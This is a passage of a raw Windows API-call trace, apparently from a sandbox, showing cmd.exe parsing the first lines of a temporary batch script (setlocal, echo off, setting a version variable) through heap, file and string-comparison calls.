_get_osfhandle (_FileHandle=3) returned 0x88 [0174.372] GetFileType (hFile=0x88) returned 0x1 [0174.372] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.372] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0174.372] GetProcessHeap () returned 0x19a8f1e0000 [0174.372] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ec5f0 [0174.372] GetProcessHeap () returned 0x19a8f1e0000 [0174.373] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec5f0) returned 1 [0174.373] GetProcessHeap () returned 0x19a8f1e0000 [0174.373] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5c30 [0174.374] _wcsicmp (_String1="set", _String2=")") returned 74 [0174.374] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.374] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.374] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.374] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.374] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.374] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.374] GetProcessHeap () returned 0x19a8f1e0000 [0174.374] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5cf0 [0174.374] GetProcessHeap () returned 0x19a8f1e0000 [0174.374] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e58f0 [0174.375] GetProcessHeap () returned 0x19a8f1e0000 [0174.375] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb920 [0174.386] _tell (_FileHandle=3) returned 32 [0174.386] _close (_FileHandle=3) returned 0 [0174.386] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.386] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.386] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.386] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.386] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.386] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.386] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.386] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.386] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.386] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.386] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.386] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.387] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.387] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.387] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.387] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.387] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.387] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.387] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.387] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.387] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.387] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.387] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.387] GetProcessHeap () returned 0x19a8f1e0000 [0174.387] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f8eb0 [0174.388] GetProcessHeap () returned 0x19a8f1e0000 [0174.388] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8eb0, Size=0x28) returned 0x19a8f1eb830 [0174.388] GetProcessHeap () returned 0x19a8f1e0000 [0174.388] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb830) returned 0x28 [0174.388] wcsncmp (_String1="masv", _String2="/", _MaxCount=0x4) returned 62 [0174.388] GetProcessHeap () returned 0x19a8f1e0000 [0174.389] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0f30 [0174.389] _wcsnicmp (_String1="ma", _String2="/A", _MaxCount=0x2) returned 62 [0174.389] _wcsnicmp (_String1="ma", _String2="/P", _MaxCount=0x2) returned 62 [0174.389] SetEnvironmentVariableW (lpName="masver", lpValue="2.6") returned 1 [0174.389] GetProcessHeap () returned 0x19a8f1e0000 [0174.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ebae0) returned 1 [0174.389] GetEnvironmentStringsW () returned 0x19a8f1fa1a0* [0174.389] GetProcessHeap () returned 0x19a8f1e0000 [0174.389] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb1a) returned 0x19a8f1facd0 [0174.389] memcpy (in: _Dst=0x19a8f1facd0, _Src=0x19a8f1fa1a0, _Size=0xb1a | out: _Dst=0x19a8f1facd0) returned 0x19a8f1facd0 [0174.389] FreeEnvironmentStringsA (penv="=") returned 1 [0174.389] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.389] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.390] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.390] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.390] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.390] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.390] SetConsoleInputExeNameW () returned 0x1 [0174.390] GetConsoleOutputCP () returned 0x1b5 [0174.391] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.391] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.391] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.391] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.392] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.392] SetFilePointer (in: hFile=0x88, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0174.392] GetProcessHeap () returned 0x19a8f1e0000 [0174.393] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f30) returned 1 [0174.393] GetProcessHeap () returned 0x19a8f1e0000 [0174.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb830) returned 1 [0174.394] GetProcessHeap () returned 0x19a8f1e0000 [0174.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0174.394] GetProcessHeap () returned 0x19a8f1e0000 [0174.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e58f0) returned 1 [0174.394] GetProcessHeap () returned 0x19a8f1e0000 [0174.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5cf0) returned 1 [0174.395] GetProcessHeap () returned 0x19a8f1e0000 [0174.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5c30) returned 1 [0174.395] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.395] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0174.395] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.395] SetFilePointer (in: hFile=0x88, lDistanceToMove=67, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x43 [0174.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@setlocal DisableDelayedExpansion\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="@setlocal DisableDelayedExpansion\r\n") returned 35 [0174.396] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.396] GetFileType (hFile=0x88) returned 0x1 [0174.396] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.396] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x43 [0174.396] GetProcessHeap () returned 0x19a8f1e0000 [0174.396] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ebae0 [0174.396] GetProcessHeap () returned 0x19a8f1e0000 [0174.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ebae0) returned 1 [0174.396] GetProcessHeap () returned 0x19a8f1e0000 [0174.396] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5c30 [0174.397] _wcsicmp (_String1="setlocal", _String2=")") returned 74 [0174.397] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0174.397] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0174.397] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0174.397] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0174.397] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0174.397] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0174.397] GetProcessHeap () returned 0x19a8f1e0000 [0174.397] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5cf0 [0174.398] GetProcessHeap () returned 0x19a8f1e0000 [0174.398] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb830 [0174.398] GetProcessHeap () returned 0x19a8f1e0000 [0174.398] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x42) returned 0x19a8f1f9540 [0174.400] _tell (_FileHandle=3) returned 67 [0174.400] _close (_FileHandle=3) returned 0 [0174.400] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0174.400] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0174.400] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0174.400] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0174.400] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0174.400] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0174.400] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0174.400] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0174.400] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0174.400] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0174.401] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0174.401] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0174.401] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0174.401] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0174.401] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0174.401] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0174.401] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0174.401] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0174.401] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0174.401] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0174.401] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0174.401] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0174.401] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0174.401] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0174.401] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0174.401] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0174.401] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0174.401] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0174.401] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0174.401] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.402] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0174.402] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0174.402] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0174.402] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0174.402] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0174.402] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0174.402] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0174.402] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0174.402] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0174.402] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0174.402] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0174.402] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0174.402] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0174.402] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0174.402] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0174.402] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0174.402] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0174.402] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0174.403] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0174.403] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0174.403] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0174.403] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0174.403] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0174.403] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0174.403] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0174.403] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0174.403] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0174.403] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0174.403] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0174.403] GetProcessHeap () returned 0x19a8f1e0000 [0174.403] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1e5db0 [0174.404] GetProcessHeap () returned 0x19a8f1e0000 [0174.404] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5db0, Size=0x42) returned 0x19a8f1e5db0 [0174.404] GetProcessHeap () returned 0x19a8f1e0000 [0174.404] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5db0) returned 0x42 [0174.404] GetProcessHeap () returned 0x19a8f1e0000 [0174.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f88e0 [0174.405] GetProcessHeap () returned 0x19a8f1e0000 [0174.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e58f0 [0174.405] GetProcessHeap () returned 0x19a8f1e0000 [0174.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb680 [0174.405] GetProcessHeap () returned 0x19a8f1e0000 [0174.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8) returned 0x19a8f1eb090 [0174.405] GetEnvironmentStringsW () returned 0x19a8f1fa1a0* [0174.405] GetProcessHeap () returned 0x19a8f1e0000 [0174.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb1a) returned 0x19a8f1ebae0 [0174.405] memcpy (in: _Dst=0x19a8f1ebae0, _Src=0x19a8f1fa1a0, _Size=0xb1a | out: _Dst=0x19a8f1ebae0) returned 0x19a8f1ebae0 [0174.405] FreeEnvironmentStringsA (penv="=") returned 1 [0174.405] GetProcessHeap () returned 0x19a8f1e0000 [0174.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1e5e10 [0174.406] GetProcessHeap () returned 0x19a8f1e0000 [0174.406] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0x42) returned 0x19a8f1e5e10 [0174.406] GetProcessHeap () returned 0x19a8f1e0000 [0174.406] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0x42 [0174.406] _wcsicmp (_String1="DisableDelayedExpansion", _String2="ENABLEEXTENSIONS") returned -1 [0174.406] _wcsicmp (_String1="DisableDelayedExpansion", _String2="DISABLEEXTENSIONS") returned -1 [0174.406] _wcsicmp (_String1="DisableDelayedExpansion", _String2="ENABLEDELAYEDEXPANSION") returned -1 [0174.407] _wcsicmp (_String1="DisableDelayedExpansion", _String2="DISABLEDELAYEDEXPANSION") returned 0 [0174.407] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.420] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.440] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.440] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.441] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.441] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.441] SetConsoleInputExeNameW () returned 0x1 [0174.442] GetConsoleOutputCP () returned 0x1b5 [0174.442] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.442] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.443] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.443] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.443] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.443] SetFilePointer (in: hFile=0x88, lDistanceToMove=67, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x43 [0174.443] GetProcessHeap () returned 0x19a8f1e0000 [0174.443] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0174.444] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.444] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x43 [0174.444] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.444] SetFilePointer (in: hFile=0x88, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0174.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@echo off\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\nisableDelayedExpansion\r\n") returned 11 [0174.444] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.444] GetFileType (hFile=0x88) returned 0x1 [0174.444] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.444] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0174.444] GetProcessHeap () returned 0x19a8f1e0000 [0174.444] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.445] GetProcessHeap () returned 0x19a8f1e0000 [0174.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.445] GetProcessHeap () returned 0x19a8f1e0000 [0174.445] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5e10 [0174.446] _wcsicmp (_String1="echo", _String2=")") returned 60 [0174.446] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0174.446] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0174.446] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0174.446] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0174.446] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0174.446] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0174.446] GetProcessHeap () returned 0x19a8f1e0000 [0174.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5ed0 [0174.446] GetProcessHeap () returned 0x19a8f1e0000 [0174.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0174.446] GetProcessHeap () returned 0x19a8f1e0000 [0174.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb770 [0174.448] _tell (_FileHandle=3) returned 78 [0174.448] _close (_FileHandle=3) returned 0 [0174.448] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0174.448] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0174.448] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0174.448] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0174.448] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0174.448] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0174.448] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0174.449] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0174.449] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0174.449] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0174.449] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.449] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0174.449] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0174.449] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0174.449] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0174.449] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0174.449] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0174.449] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0174.449] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0174.450] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0174.450] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0174.450] GetProcessHeap () returned 0x19a8f1e0000 [0174.450] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb9e0 [0174.450] GetProcessHeap () returned 0x19a8f1e0000 [0174.450] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x1a) returned 0x19a8f1eb6b0 [0174.450] GetProcessHeap () returned 0x19a8f1e0000 [0174.450] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6b0) returned 0x1a [0174.450] GetProcessHeap () returned 0x19a8f1e0000 [0174.450] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb860 [0174.450] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0174.450] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.450] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.451] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.451] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.451] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.451] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.452] SetConsoleInputExeNameW () returned 0x1 [0174.452] GetConsoleOutputCP () returned 0x1b5 [0174.452] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.452] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.453] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.453] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.453] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.453] SetFilePointer (in: hFile=0x88, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0174.453] GetProcessHeap () returned 0x19a8f1e0000 [0174.454] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0174.455] GetProcessHeap () returned 0x19a8f1e0000 [0174.455] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.455] GetProcessHeap () returned 0x19a8f1e0000 [0174.455] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0174.455] GetProcessHeap () returned 0x19a8f1e0000 [0174.455] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0174.455] GetProcessHeap () returned 0x19a8f1e0000 [0174.455] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5ed0) returned 1 [0174.455] GetProcessHeap () returned 0x19a8f1e0000 [0174.456] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0174.456] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.456] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0174.456] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.456] SetFilePointer (in: hFile=0x88, lDistanceToMove=80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0174.456] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ncho off\r\nisableDelayedExpansion\r\n") returned 2 [0174.456] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.456] GetFileType (hFile=0x88) returned 0x1 [0174.456] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.456] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 